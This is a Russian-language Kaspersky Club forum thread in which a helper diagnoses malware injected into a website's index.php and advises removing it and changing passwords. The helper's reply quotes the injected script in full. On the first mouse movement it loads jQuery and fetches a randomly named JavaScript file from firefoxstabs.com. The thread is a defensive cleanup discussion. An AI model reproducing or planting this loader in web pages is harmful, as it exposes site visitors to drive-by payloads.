Перейти к содержанию
Правила раздела
Объявляем набор участников в программу «Развитие сообществ клуба в мессенджерах»
Конкурс по разработке Telegram-бота Kaspersky Club

Вирус на сайте

Mr.kvn

Автор Mr.kvn
в Помощь в удалении вирусов

 Поделиться

Рекомендуемые сообщения

Mr.kvn Постоялец

Mr.kvn

Опубликовано
Опубликовано

Доброго времени суток!

У меня следующая проблема: я помогаю в администрировании сайта mtt.com.ua. Все было хорошо и вот месяц назад начались проблемы - на многих страницах сайта разные антивирусные системы (в т.ч. и касперский) начали ругаться. Сам сайт я не создавал (там самописная админка и изобретателя найти не представляется возможным). До поры, до времени я не особо нервничал т.к. все вирусы были в java-скриптах, которые я аккуратненько удалял (сделав бэкап) и при этом функционал не менялся (по крайней мере я не видел и жалоб до сих пор не поступало). Но сейчас беда оказалась в index-ном файле категории... Тут уже мириться не представляется возможным.

 

Ссылка проверки на вирусы: virustotal

 

Заранее благодарю за помощь в решении проблеммы.

Сообщение от модератора Mark D. Pearlstone
Файл и потенциально вредоносная ссылка удалены. Если потребуется, хелперы запросят у вас ссылку, которую вы можете им передать через личные сообщения.
Ссылка на комментарий
Поделиться на другие сайты
SLASH_id Гигант мысли

SLASH_id

Опубликовано
Опубликовано

Отредактируйте index.php

Удалите оттуда скрипт в самом конце:

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});</script>document.write('<scr'+'ipt src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></scr'+'ipt>');var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});

 

Смените пароли на админку, хостинг и прочие.

Ссылка на комментарий
Поделиться на другие сайты
Mr.kvn Постоялец

Mr.kvn

Опубликовано
  • Автор
Опубликовано

Адрес https://ajax.googleapis.com/ajax/libs/jquer...1/jquery.min.js вроде как безобидный...

 

Дело в том, что этот скрипт предназначается для вставки Google Analytics из админки. Другой вопрос, что на других старницах все норм, а тут... Я абсолютный дуб в java, поэтому не знаю какой фрагмент отсюда вырезать, чтобы функционал остался на месте, а вируса не было...

 

P.s. собственно, где тут вирус? Поясните пожалуйста... просто чтобы на будущее знать.

Ссылка на комментарий
Поделиться на другие сайты
SLASH_id Гигант мысли

SLASH_id

Опубликовано
Опубликовано (изменено)

Отрежьте все после 

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script>

А лучше вырежьте все. А после - вставьте код от Google Analytics

Изменено пользователем SLASH_id
Ссылка на комментарий
Поделиться на другие сайты
Mark D. Pearlstone Мудрец

Mark D. Pearlstone

Опубликовано
Опубликовано
У меня в данный момент не ругается на http://mtt.com.ua/
Аналогично.. все нормально.

На данную ссылку и утром антивирус не ругался, поэтому она была не удалена. Ссылка же с детектом была убрана из первого сообщения.

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • Ig0r
      Индексация сайта в поисковиках
      Автор Ig0r
      Уже 112 страниц проиндексировал. Я его привел.
    • Ivan A.
      Вход на сайты через авторизацию ЕСИА
      Автор Ivan A.
      Всем привет. Вопрос по входу на сторонние сайты через госуслуги (ЕСИА).
      Если в браузере сначала зайти на госуслуги, а в соседней вкладке зайти на сайт в котором предусмотрена авторизация через ЕСИА (например ФНС) - то нажав на соответствующий пункт 
      меню мы автоматически авторизуемся на сайте без ввода Логина и пароля.
      Вопрос в следующем: может ли фишинговы ресурс с поддельной авторизацией через ЕСИА получить верификацию.
      т.е.:
      Зашел на Госуслуги > Зашел на сайт ФНС нажал авторизацию ЕСИА > вход выполнен - вывод Подлинный сайт ФНС Зашел на Госуслуги > Зашел на сайт МФО нажал авторизацию ЕСИА > сайт просит ввести Логин и пароль - вывод фишинговый сайт МФО  
       
    • qwester
      Сайт блокируется ФинСерт
      Автор qwester
      Прошу прощения если не туда.
      У меня есть интеренет-магазин, который принимает оплату по банковским картам, но клиенты не могут оплатить, в службе поддержки эквайринга из банка написали следущее:
      IP-адрес XXX был заблокирован по рекомендации от ФинЦерт.
      Для исключения ip-адреса из списка ФинЦерт коллеги порекомендовали обратиться в Лабораторию Касперского, так как информация в ФинЦерт поступила от них.
       
      Что с этим делать? Сайт находится на общем хостинге, не VDS
    • Dava
      Вирус
      Автор Dava
      Поймал вирус с торрента который устанавливал мне адблок в эдж, вирус и его папки я нашел и удалил, позже удалил торрент, но теперь при открытии эджа у меня пишет "Microsoft edge неожиданно завершил работу, восстановить страницы?"
      Удалять куки и сбрасывать настройки к начальным и тыкать Repair я пробовал, это не помогло. Я предполагаю что где то еще остался вирусняк который лезет в эдж, но касперский его не видит
      Addition.txt FRST.txt
    • Abzz
      Вирус "updater.exe"
      Автор Abzz
      Здраствуйте, абсолютно аналогичная проблема, но не получается перейти по выделенной вами ссылке архива 
      "Скачайте архив по ссылке, распакуйте. Запустите каждый из файлов и подтвердите внесение информации в реестр."
      переносит нету файла для скачивания, помогите пожалуйста.
       
      Сообщение от модератора Mark D. Pearlstone Перемещено из темы.
       
       
×
×
  • Создать...